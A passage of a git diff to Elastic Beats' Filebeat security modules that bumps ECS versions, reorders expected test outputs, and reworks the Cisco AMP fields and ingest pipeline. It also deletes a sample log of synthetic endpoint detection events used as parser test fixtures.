"azure.signinlogs.properties.risk_event_types_v2": [], + "azure.signinlogs.properties.risk_level_aggregated": "none", + "azure.signinlogs.properties.risk_level_during_signin": "none", + "azure.signinlogs.properties.risk_state": "none", + "azure.signinlogs.properties.service_principal_id": "", + "azure.signinlogs.properties.status.error_code": 0, + "azure.signinlogs.properties.token_issuer_name": "", + "azure.signinlogs.properties.token_issuer_type": "AzureAD", + "azure.signinlogs.properties.user_display_name": "Doe, John", + "azure.signinlogs.properties.user_id": "762a6171-29d0-456b-b88b-ca7f7d99728d", + "azure.signinlogs.properties.user_principal_name": "john.doe@example.com", + "azure.signinlogs.properties.user_type": "Member", + "azure.signinlogs.result_signature": "None", + "azure.signinlogs.result_type": "0", + "azure.tenant_id": "19aa547c-22ab-606d-a4b6-541c5ce52b71", + "client.ip": "8.8.8.8", + "cloud.provider": "azure", + "event.action": "Sign-in activity", + "event.category": [ + "authentication" + ], + "event.dataset": "azure.signinlogs", + "event.duration": 0, + "event.kind": "event", + "event.module": "azure", + "event.original": "{\"Level\":4,\"callerIpAddress\":\"8.8.8.8\",\"category\":\"SignInLogs\",\"correlationId\":\"1ba108d9-9609-48be-baee-afc0885baa06\",\"durationMs\":0,\"identity\":\"Doe, John\",\"location\":\"US\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office365 Shell WCSS-Client\",\"appId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"appliedConditionalAccessPolicies\":[{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"On-Prem Access Only\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"123ebbf1-e868-4a77-bfd9-b59bd6c2412e\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":0,\"conditionsSatisfied\":0,\"displayName\":\"ForceMFAfor B2C\",\"enforcedGrantControls\":[],\"enforcedSessionControls\":[],\"id\":\"0dff3d49-001e-413f-86eb-2800e789674c\",\"result\":\"notEnabled\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"Baseline policy: Require MFA for admins\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"a5527e71-9da1-41d0-859b-7ca84dae03a7\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"Baseline Policy: Blocks legacy authentication\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"c1311105-97ac-4ebd-a866-5b215d066765\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"Netscaler MFA\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[\"SignInFrequency\"],\"id\":\"ee756a5f-8c3b-41eb-8ace-0839597f718a\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":8,\"conditionsSatisfied\":19,\"displayName\":\"Enforce Verification on External Access\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[\"SignInFrequency\"],\"id\":\"913f5adc-cd20-4b35-93b8-fbe145f68444\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"Test Policy\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"cf0d2cec-b974-4fd3-a1d3-da4ae1e896fa\",\"result\":\"notApplied\"}],\"authenticationDetails\":[{\"RequestSequence\":0,\"StatusSequence\":0,\"authenticationMethod\":\"Previously satisfied\",\"authenticationStepDateTime\":\"2021-01-26T13:39:55.7863053+00:00\",\"authenticationStepRequirement\":\"Primary authentication\",\"authenticationStepResultDetail\":\"First factor requirement satisfied by claim in the token\",\"succeeded\":true}],\"authenticationProcessingDetails\":[{\"key\":\"Domain Hint Present\",\"value\":\"True\"},{\"key\":\"Login Hint Present\",\"value\":\"True\"},{\"key\":\"Private Link Id\",\"value\":\"0\"},{\"key\":\"Azure AD App Authentication Library\",\"value\":\"Family: ADAL Library: ADAL.Js 1.0.15 Platform: JS\"},{\"key\":\"IsCAEToken\",\"value\":\"False\"}],\"authenticationRequirement\":\"singleFactorAuthentication\",\"authenticationRequirementPolicies\":[],\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"success\",\"correlationId\":\"1ba108d9-9609-48be-baee-afc0885baa06\",\"createdDateTime\":\"2021-01-26T13:39:55.7863053+00:00\",\"deviceDetail\":{\"browser\":\"Chrome 87.0.4280\",\"deviceId\":\"\",\"operatingSystem\":\"Windows 10\"},\"flaggedForReview\":false,\"id\":\"a9222177-db03-40ef-9b86-5b207ed72000\",\"ipAddress\":\"192.168.108.29\",\"isInteractive\":true,\"location\":{\"city\":\"Pierre\",\"countryOrRegion\":\"US\",\"geoCoordinates\":{\"latitude\":44.567081451416016,\"longitude\":-100.26722717285156},\"state\":\"South Dakota\"},\"networkLocationDetails\":[],\"originalRequestId\":\"a9222177-db03-40ef-9b86-5b207ed72000\",\"processingTimeInMilliseconds\":162,\"resourceDisplayName\":\"Microsoft Graph\",\"resourceId\":\"00000003-0000-0000-c000-000000000000\",\"resourceTenantId\":\"19aa547c-22ab-606d-a4b6-541c5ce52b71\",\"riskDetail\":\"none\",\"riskEventTypes\":[],\"riskEventTypes_v2\":[],\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":0},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\",\"userDisplayName\":\"Doe, John\",\"userId\":\"762a6171-29d0-456b-b88b-ca7f7d99728d\",\"userPrincipalName\":\"john.doe@example.com\",\"userType\":\"Member\"},\"resourceId\":\"/tenants/19aa547c-22ab-606d-a4b6-541c5ce52b71/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"0\",\"tenantId\":\"19aa547c-22ab-606d-a4b6-541c5ce52b71\",\"time\":\"2021-01-26T13:39:55.7863053Z\"}", + "event.outcome": "success", + "event.type": [ + "info" + ], + "fileset.name": "signinlogs", + "geo.city_name": "Pierre", + "geo.country_iso_code": "US", + "geo.country_name": "South Dakota", + "geo.location.lat": 44.567081451416016, + "geo.location.lon": -100.26722717285156, + "input.type": "log", + "log.level": 4, + "log.offset": 3390, + "related.ip": [ + "8.8.8.8" + ], + "service.type": "azure", + "source.as.number": 15169, + "source.as.organization.name": "Google LLC", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 37.751, + "source.geo.location.lon": -97.822, + "source.ip": "8.8.8.8", + "tags": [ + "forwarded" + ], + "user.domain": "example.com", + "user.full_name": "Doe, John", + "user.id": "762a6171-29d0-456b-b88b-ca7f7d99728d", + "user.name": "john.doe", + "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", + "user_agent.name": "Chrome", + "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36", + "user_agent.os.full": "Windows 10", + "user_agent.os.name": "Windows", + "user_agent.os.version": "10", + "user_agent.version": "87.0.4280.141" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/barracuda/spamfirewall/config/input.yml b/x-pack/filebeat/module/barracuda/spamfirewall/config/input.yml index f4f33a69fe8..52dcb6a548d 100644 --- a/x-pack/filebeat/module/barracuda/spamfirewall/config/input.yml +++ b/x-pack/filebeat/module/barracuda/spamfirewall/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/barracuda/spamfirewall/test/generated.log-expected.json b/x-pack/filebeat/module/barracuda/spamfirewall/test/generated.log-expected.json index e9af3c2a3d1..504e985950a 100644 --- a/x-pack/filebeat/module/barracuda/spamfirewall/test/generated.log-expected.json +++ b/x-pack/filebeat/module/barracuda/spamfirewall/test/generated.log-expected.json @@ -872,8 +872,8 @@ "observer.type": "Anti-Virus", "observer.vendor": "Barracuda", "related.hosts": [ - "lit5929.test", - "hitect" + "hitect", + "lit5929.test" ], "related.ip": [ "10.198.6.166" @@ -1008,8 +1008,8 @@ "observer.type": "Anti-Virus", "observer.vendor": "Barracuda", "related.hosts": [ - "vitaedi", - "neav6028.internal.domain" + "neav6028.internal.domain", + "vitaedi" ], "related.ip": [ "10.128.114.77" @@ -3159,8 +3159,8 @@ "observer.type": "Anti-Virus", "observer.vendor": "Barracuda", "related.ip": [ - "10.1.6.115", - "10.178.30.158" + "10.178.30.158", + "10.1.6.115" ], "rsa.internal.messageid": "outbound/smtp", "rsa.investigations.event_cat": 1901000000, @@ -3269,8 +3269,8 @@ "observer.type": "Anti-Virus", "observer.vendor": "Barracuda", "related.hosts": [ - "piciatis2460.api.host", - "der" + "der", + "piciatis2460.api.host" ], "related.ip": [ "10.77.182.191" diff --git a/x-pack/filebeat/module/barracuda/waf/config/input.yml b/x-pack/filebeat/module/barracuda/waf/config/input.yml index 26be6dda115..5ec637436f5 100644 --- a/x-pack/filebeat/module/barracuda/waf/config/input.yml +++ b/x-pack/filebeat/module/barracuda/waf/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/bluecoat/director/config/input.yml b/x-pack/filebeat/module/bluecoat/director/config/input.yml index a907db353bb..8ce114c4bad 100644 --- a/x-pack/filebeat/module/bluecoat/director/config/input.yml +++ b/x-pack/filebeat/module/bluecoat/director/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/cef/log/config/input.yml b/x-pack/filebeat/module/cef/log/config/input.yml index 7916908599e..f6f9ffc4bb8 100644 --- a/x-pack/filebeat/module/cef/log/config/input.yml +++ b/x-pack/filebeat/module/cef/log/config/input.yml @@ -28,7 +28,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 {{ if .external_zones }} - add_fields: diff --git a/x-pack/filebeat/module/checkpoint/firewall/config/firewall.yml b/x-pack/filebeat/module/checkpoint/firewall/config/firewall.yml index 1925a535c24..cc5e898bba9 100644 --- a/x-pack/filebeat/module/checkpoint/firewall/config/firewall.yml +++ b/x-pack/filebeat/module/checkpoint/firewall/config/firewall.yml @@ -28,7 +28,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 {{ if .external_zones }} - add_fields: target: _temp_ diff --git a/x-pack/filebeat/module/cisco/amp/_meta/fields.yml b/x-pack/filebeat/module/cisco/amp/_meta/fields.yml index de20fe61484..ff246eeaa45 100644 --- a/x-pack/filebeat/module/cisco/amp/_meta/fields.yml +++ b/x-pack/filebeat/module/cisco/amp/_meta/fields.yml @@ -160,7 +160,7 @@ description: > SHA1 hash of the archived file related to the malicious event. - - name: file.archived_file.identify.sha256 + - name: file.archived_file.identity.sha256 type: keyword description: > SHA256 hash of the archived file related to the malicious event. @@ -265,7 +265,27 @@ description: > List of all MITRE tactics related to the incident found. + - name: mitre_tactics + type: keyword + description: > + Array of all related mitre tactic ID's + - name: techniques type: flattened description: > - List of all MITRE techniques related to the incident found. \ No newline at end of file + List of all MITRE techniques related to the incident found. + + - name: mitre_techniques + type: keyword + description: > + Array of all related mitre technique ID's + + - name: command_line.arguments + type: keyword + description: > + The CLI arguments related to the Cloud Threat IOC reported by Cisco. + + - name: bp_data + type: flattened + description: > + Endpoint isolation information \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/config/config.yml b/x-pack/filebeat/module/cisco/amp/config/config.yml index 8e4695d7458..27fe480ba84 100644 --- a/x-pack/filebeat/module/cisco/amp/config/config.yml +++ b/x-pack/filebeat/module/cisco/amp/config/config.yml @@ -17,6 +17,9 @@ request.timeout: {{ .request_timeout }} {{ if .ssl }} request.ssl: {{ .ssl | tojson }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.transforms: - set: target: url.params.start_date @@ -61,17 +64,17 @@ processors: - decode_json_fields: fields: [message] target: json - - if: - has_fields: ["json.data.id"] - then: - - fingerprint: - fields: ["json.data.id"] - target_field: "@metadata._id" - else: - - fingerprint: - fields: ["json.data.timestamp", "json.data.event_type_id", "json.data.connector_guid"] - target_field: "@metadata._id" + - fingerprint: + fields: + - "json.data.timestamp" + - "json.data.timestamp_nanoseconds" + - "json.data.event_type_id" + - "json.data.connector_guid" + - "json.data.id" + - "json.data.detection_id" + target_field: "@metadata._id" + ignore_missing: true - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml b/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml index b77c3be1f9c..b75214cc297 100644 --- a/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml +++ b/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml @@ -76,6 +76,15 @@ processors: ignore_failure: true if: ctx?.cisco?.amp?.start_timestamp != null +- rename: + field: cisco.amp.techniques + target_field: cisco.amp.mitre_techniques + if: "ctx?.cisco?.amp?.techniques != null && ctx?.cisco?.amp?.techniques.length > 0 && ctx?.cisco?.amp?.techniques[0] instanceof String" +- rename: + field: cisco.amp.tactics + target_field: cisco.amp.mitre_tactics + if: "ctx?.cisco?.amp?.tactics != null && ctx?.cisco?.amp?.tactics.length > 0 && ctx?.cisco?.amp?.tactics[0] instanceof String" + ###################### ## ECS Host Mapping ## ###################### @@ -189,6 +198,10 @@ processors: field: cisco.amp.file.parent.process_id target_field: process.pid ignore_missing: true +- rename: + field: cisco.amp.network_info.parent.process_id + target_field: process.pid + ignore_missing: true - rename: field: cisco.amp.file.parent.file_name target_field: process.name @@ -205,10 +218,9 @@ processors: field: cisco.amp.file.parent.identity.md5 target_field: process.hash.md5 ignore_missing: true - - rename: - field: cisco.amp.network_info.parent.process_id - target_field: process.pid + field: cisco.amp.file.parent.identity.md5 + target_field: process.hash.md5 ignore_missing: true - rename: field: cisco.amp.network_info.parent.file_name @@ -300,21 +312,39 @@ processors: value: "{{ cisco.amp.computer.external_ip }}" if: ctx?.cisco?.amp?.computer?.external_ip != null allow_duplicates: false -- foreach: - field: cisco.amp.computer.network_addresses - processor: - append: - field: related.ip - value: "{{ _ingest._value.ip }}" - allow_duplicates: false +- script: + lang: painless + source: | + if (ctx?.related == null) { + ctx.related = new HashMap(); + } + if (ctx?.related?.ip == null) { + ctx.related.ip = new ArrayList(); + } + for (addr in ctx?.cisco?.amp?.computer?.network_addresses) { + if (addr.ip != null && !addr.ip.isEmpty()) { + if (!ctx?.related?.ip.contains(addr.ip)) { + ctx?.related?.ip.add(addr.ip); + } + } + } if: ctx?.cisco?.amp?.computer?.network_addresses != null -- foreach: - field: cisco.amp.computer.network_addresses - processor: - append: - field: cisco.amp.related.mac - value: "{{ _ingest._value.mac }}" - allow_duplicates: false +- script: + lang: painless + source: | + if (ctx?.cisco?.amp?.related == null) { + ctx.cisco.amp.related = new HashMap(); + } + if (ctx?.cisco?.amp?.related?.mac == null) { + ctx.cisco.amp.related.mac = new ArrayList(); + } + for (addr in ctx?.cisco?.amp?.computer?.network_addresses) { + if (addr.mac != null && !addr.mac.isEmpty()) { + if (!ctx?.cisco?.amp?.related?.mac.contains(addr.mac)) { + ctx?.cisco?.amp?.related?.mac.add(addr.mac); + } + } + } if: ctx?.cisco?.amp?.computer?.network_addresses != null - foreach: field: cisco.amp.vulnerabilities diff --git a/x-pack/filebeat/module/cisco/amp/manifest.yml b/x-pack/filebeat/module/cisco/amp/manifest.yml index 9458f80a17d..1c3b263d34c 100644 --- a/x-pack/filebeat/module/cisco/amp/manifest.yml +++ b/x-pack/filebeat/module/cisco/amp/manifest.yml @@ -18,6 +18,7 @@ var: default: 24h - name: interval default: 60m + - name: proxy_url ingest_pipeline: - ingest/pipeline.yml diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log deleted file mode 100644 index 14599ecfc0c..00000000000 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log +++ /dev/null @@ -1,8 +0,0 @@ -{"data":{"id":123578990,"timestamp":1605088298,"timestamp_nanoseconds":153000000,"date":"2020-11-11T09:51:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.22gp.1201","detection_id":"12365423467","connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","user":"user@domain","active":true,"network_addresses":[{"ip":"192.168.196.22","mac":"aa:d9:ac:af:1d:ad"},{"ip":"192.168.120.1","mac":"12:24:56:c2:00:01"},{"ip":"192.168.160.1","mac":"12:50:56:c2:53:08"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543","trajectory":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/12354373906b43b5347"}},"file":{"disposition":"Malicious","file_name":"HYXiN3hY.exe.part","file_path":"\\\\?\\C:\\Users\\elastic\\AppData\\Local\\Temp\\HYXiN3hY.exe.part","identity":{"sha256":"e678899d7ea9702184067b56655f91b69f8a0bdc9df65613762252c055c2cdvc","sha1":"d0c4192b65e36553fvfd2b83f3113f6ae8390baa","md5":"9a8557b98ed1469272fa0ace91d63477"},"parent":{"process_id":88,"disposition":"Unknown","file_name":"firefox.exe","identity":{"sha256":"a7ca534327103ec5fac749f5ab8b7a1fe81209aa580a52df656284ef6215f0ab","sha1":"d539afb0991e823c7cdf824b610a5a5d7655a2da","md5":"e50ab86d5409d4d0ad386b27ea7f78fb"}}}}} -{"data":{"id":123578990,"timestamp":1605088298,"timestamp_nanoseconds":163000000,"date":"2020-11-11T09:51:38+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"12365423467","connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.196.22","mac":"aa:d9:bb:af:22:fd"},{"ip":"192.168.120.1","mac":"00:52:12:c0:11:01"},{"ip":"192.168.160.1","mac":"01:51:56:c0:c2:08"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543","trajectory":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/12354373906b43b5347"}},"file":{"disposition":"Malicious","identity":{"sha256":"e678899d7ea9702184167b56655f91a69f8a0bdc9df65612762252c053c2cd7c"}}}} -{"data":{"id":123578990,"timestamp":1605085728,"timestamp_nanoseconds":183000000,"date":"2020-11-11T09:08:48+00:00","event_type":"Exploit Prevention","event_type_id":1090519103,"detection_id":"12365423467","connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","user":"uuser@domain","active":true,"network_addresses":[{"ip":"192.1.1.1","mac":"av:1d:13:a2:21:1f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/cad0e0c8-asdf5234-42346-82aa-1235","trajectory":"https://api.eu.amp.cisco.com/v1/computers/cad0e0c8-asdf5234-42346-82aa-1235/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/0c246ccd-45123214-4d30-900f-12454354354423"}},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe","identity":{"sha256":"2262a4766bc394b4cb2d658144b207183ff23a3039121cd74e615ab64e6e57d6","sha1":"22643e8613bb0dd90888b17367007489fe16693e4","md5":"bcc2a6493e0641bb1e60cbf640169e579"},"parent":{"process_id":7328,"disposition":"Unknown","file_name":"OfficeSetup.exe","identity":{"sha256":"a6d1aa0df1c23eb8b7563245082ed2eddf00e3da62cbeb41ac701123vasce927f465d","sha1":"90d3a389307ag2a7fbv8726502077b69ab0fd79a0","md5":"6a262b4af012ec81ffeb36f5faf70311"}},"attack_details":{"application":"powershell.exe","attacked_module":"Script Control:System.Management.Automation.dll","base_address":"0x000F0000","suspicious_files":[""],"indicators":[{"MITRE_Tactic":[{"tactic_id":"TA0002","name":"Execution"}],"severity":"medium","description":"A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.","short_description":"Excessively long PowerShell command detected","id":123578990,"MITRE_Technique":[{"tehcnique_id":"T1086","name":"PowerShell","technique_id":"T1086"}]}]}}}} -{"data":{"id":123578990,"timestamp":1605084750,"timestamp_nanoseconds":736000000,"date":"2020-11-11T08:52:30+00:00","event_type":"File Fetch Failed","event_type_id":2164260910,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"error":{"error_code":3240099848,"description":"File not found"},"computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.1.184","mac":"av:6b:fc:23:a1:29"},{"ip":"192.168.2.1","mac":"00:50:24:c0:01:01"},{"ip":"192.168.12.1","mac":"55:50:22:c0:12:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/11ac0afb-123456-45b5-84bc-543asbvdcasd","trajectory":"https://api.eu.amp.cisco.com/v1/computers/11ac0afb-123456-45b5-84bc-543asbvdcasd/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/0c246ccd-45123214-4d30-900f-12454354354423"}},"file":{"disposition":"Unknown","file_name":"setup.exe","file_path":"\\\\?\\C:\\Users\\elastic\\AppData\\Local\\Temp\\somezip.zip\\Visual_install\\setup.exe","identity":{"sha256":"a8b424b65d1550c87b531f7a14523bvdf982d8f869976f99fa1cef5342ausdy"}}}} -{"data":{"id":123578990,"timestamp":1605079734,"timestamp_nanoseconds":24000000,"date":"2020-11-11T07:28:54+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","start_timestamp":1605079733,"start_date":"2020-11-11T07:28:53+00:00","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.2.2","mac":"ac:aa:22:00:11:55"},{"ip":"192.168.228.70","mac":"f2:18:12:75:55:12"},{"ip":"192.12.52.12","mac":"65:29:8f:97:04:ea"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/1224532-sadf-dsf2134-bb5b-1235213","trajectory":"https://api.eu.amp.cisco.com/v1/computers/1224532-sadf-dsf2134-bb5b-123512/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/64535234-123dfsg-3245sdf-123"}},"cloud_ioc":{"description":"A process was seen whitelisting/restoring a file from quarantine. This is an uncommon task, and warrants further investigation as OS X is not known to quarantine files unnecessarily. This is also known to be part of the Mitre Att&ck Framework, technique T1144.","short_description":"OSX.QuarantineExclusion.ioc"},"file":{"disposition":"Clean","file_name":"sudo","file_path":"file:///usr/bin/sudo","identity":{"sha256":"123dfsdg234b7ba3d5ff63033129fa1b96975ad124sdgasdf1sdf"},"parent":{"disposition":"Clean","identity":{"sha256":"sadgf234643sdaffee7a9bd309a4123sdfag9523e8b152123sdfgdfsf2"}}},"command_line":{"arguments":"sudo /usr/bin/xattr -r -d com.apple.quarantine uTorrent.app"},"tactics":["TA0005"],"techniques":["T1144"]}} -{"data":{"id":123578990,"timestamp":1605079353,"timestamp_nanoseconds":170000000,"date":"2020-11-11T07:22:33+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.1.2","mac":"11:50:f1:12:23:23"},{"ip":"192.168.1.1","mac":"0a:12:27:52:00:12"},{"ip":"192.168.2.1","mac":"00:c1:12:c0:22:12"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/1234d-sadf-234-sdf-123","trajectory":"https://api.eu.amp.cisco.com/v1/computers/1234d-sadf-234-sdf-123/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/123543-sdgfdf234-sadf13-123"}},"file":{"disposition":"Unknown","file_name":"locale.exe","file_path":"\\\\?\\C:\\tools\\msys64\\usr\\bin\\locale.exe","identity":{"sha256":"asdf123sdfaac359fcb0d488ca489e2d55645ce34709fdafb78e336405cb","sha1":"asdfsadf1234140de34a45db0124e5c518bf612","md5":"asdgsdrf2346523279149285c8ddc8"}}}} -{"data":{"id":123578990,"timestamp":1605079316,"timestamp_nanoseconds":611596000,"date":"2020-11-11T07:21:56+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.2.1","mac":"f2:18:12:23:c5:54"},{"ip":"","mac":"82:2a:e3:12:58:02"},{"ip":"","mac":"vg:de:12:00:v1:22"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/634532-sdf-234-dsfga-123","trajectory":"https://api.eu.amp.cisco.com/v1/computers/634532-sdf-234-dsfga-123/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/64535234-123dfsg-3245sdf-123"}},"file":{"disposition":"Clean","file_name":"sudo","file_path":"/usr/bin/sudo","identity":{"sha256":"123asfdsdfa125ff63033129fa1b96975ad4d6da2e2a4cf6393"}}}} -{"data":{"id":123578990,"timestamp":1605030133,"timestamp_nanoseconds":0,"date":"2020-11-10T17:42:13+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Low","start_timestamp":1605030131,"start_date":"2020-11-10T17:42:11+00:00","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.2.42","mac":"av:17:1b:fe:v2:f0"},{"ip":"192.168.1.1","mac":"00:42:v2:3c:12:12"},{"ip":"192.168.6.1","mac":"1f:12:27:00:00:52"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/124324df-2123-523-41231","trajectory":"https://api.eu.amp.cisco.com/v1/computers/124324df123-523-41231/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/1235643-sdf123123"}},"file":{"disposition":"Clean","file_name":"AcroRd32.exe","identity":{"sha256":"5643234fsadgef6644b8b69e999c454c045a2d8ec476c4b6165df4ed03"},"parent":{"disposition":"Clean","identity":{"sha256":"agdfsdaf987sdf036070cca561bff5337c472313c0cb4ad"}}},"vulnerabilities":[{"name":"Adobe Acrobat Reader","version":"15.007.20033","cve":"CVE-2014-0566","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0566"},{"cve":"CVE-2015-3095","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3095"},{"cve":"CVE-2015-4435","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4435"},{"cve":"CVE-2015-4438","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4438"},{"cve":"CVE-2015-4441","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4441"},{"cve":"CVE-2015-4445","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4445"},{"cve":"CVE-2015-4446","score":"7.5","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4446"},{"cve":"CVE-2015-4447","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4447"},{"cve":"CVE-2015-4448","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4448"},{"cve":"CVE-2015-4451","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4451"},{"cve":"CVE-2015-4452","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4452"},{"cve":"CVE-2015-5085","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5085"},{"cve":"CVE-2015-5086","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5086"